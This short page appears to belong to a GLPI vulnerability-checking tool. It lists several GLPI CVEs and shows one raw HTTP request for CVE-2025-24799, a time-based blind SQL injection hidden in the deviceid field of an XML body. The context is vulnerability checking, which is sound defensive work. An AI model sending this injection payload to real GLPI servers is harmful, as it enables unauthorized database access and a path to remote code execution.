GLPI
GLPI vulnerabilities checking tool
CVE-2025-24799/CVE-2025-24801: SQLi to RCE
POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232
<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>
SSRF (CVE-2024-27098) and SQL injection (CVE-2024-27096)
CVE-2023-41320
GLPI htmlawed (CVE-2022-35914)
Last updated